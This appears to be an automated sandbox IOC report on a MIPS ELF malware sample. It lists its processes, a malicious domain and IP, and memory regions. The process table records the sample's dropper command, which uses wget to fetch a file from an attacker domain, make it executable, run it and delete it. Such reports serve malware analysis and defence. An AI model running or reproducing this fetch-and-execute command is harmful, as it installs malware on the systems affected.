IOC Report
mipsel.elf

loading gif

Processes

Path
Cmdline
Malicious
/tmp/mipsel.elf
/tmp/mipsel.elf
/tmp/mipsel.elf
-
/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
/bin/sh
-
/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
/bin/sh
-
/usr/bin/chmod
chmod 777 .....
/bin/sh
-
/bin/sh
/bin/sh ./.....
/bin/sh
-
/usr/bin/rm
rm -rf .....
/tmp/mipsel.elf
-
/tmp/mipsel.elf
-
/tmp/mipsel.elf
-
There are 4 hidden processes, click here to show them.

Domains

Name
IP
Malicious
gay.energy
unknown
malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
92.60.77.69
unknown
Italy
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
7f2e40421000
page execute read
malicious
7f2e40421000
page execute read
malicious
7f2e40421000
page execute read
malicious
55c80b0d3000
page read and write
7f2ec0000000
page read and write
55c80da7b000
page read and write
7f2ec818a000
page read and write
7f2ec7b2b000
page read and write
7f2ec880d000
page read and write
7f2ec880d000
page read and write
55c80b0d3000
page read and write
7f2ec7323000
page read and write
7f2ec8805000
page read and write
7ffd93afa000
page read and write
7f2ec86dc000
page read and write
55c80b0dd000
page read and write
7f2ec7323000
page read and write
7f2ec84fb000
page read and write
7f2ec7de9000
page read and write
7f2ec7b39000
page read and write
7f2ec7de9000
page read and write
7f2ec880d000
page read and write
7f2ec81ca000
page read and write
7ffd93bd7000
page execute read
7f2ec818a000
page read and write
7f2ec84fb000
page read and write
7f2ec81ca000
page read and write
7f2ec8852000
page read and write
7ffd93bd7000
page execute read
7f2ec81ad000
page read and write
55c80da7b000
page read and write
7f2ec7b2b000
page read and write
7f2e40469000
page read and write
55c80d0db000
page execute and read and write
55c80d0db000
page execute and read and write
55c80d0f2000
page read and write
7f2ec7b39000
page read and write
7f2ec86dc000
page read and write
7f2ec81ad000
page read and write
7f2ec81ad000
page read and write
7f2ec0000000
page read and write
7f2ec8805000
page read and write
7f2e40461000
page read and write
7f2e40469000
page read and write
7f2e40461000
page read and write
7f2ec8805000
page read and write
7f2ec7b2b000
page read and write
55c80b0d3000
page read and write
7f2ec84fb000
page read and write
55c80da7b000
page read and write
7f2ec81ca000
page read and write
55c80ae4b000
page execute read
55c80d0f2000
page read and write
7f2ec86dc000
page read and write
55c80b0dd000
page read and write
7f2ec7de9000
page read and write
7f2ec0021000
page read and write
7ffd93afa000
page read and write
7f2ec8852000
page read and write
7f2ec7b39000
page read and write
55c80ae4b000
page execute read
55c80b0dd000
page read and write
7ffd93afa000
page read and write
7f2ec8852000
page read and write
7f2e40461000
page read and write
55c80d0db000
page execute and read and write
7f2ec818a000
page read and write
7f2ec7323000
page read and write
55c80ae4b000
page execute read
55c80d0f2000
page read and write
7f2ec0000000
page read and write
7f2e40469000
page read and write
7f2ec0021000
page read and write
7ffd93bd7000
page execute read
7f2ec0021000
page read and write
There are 65 hidden memdumps, click here to show them.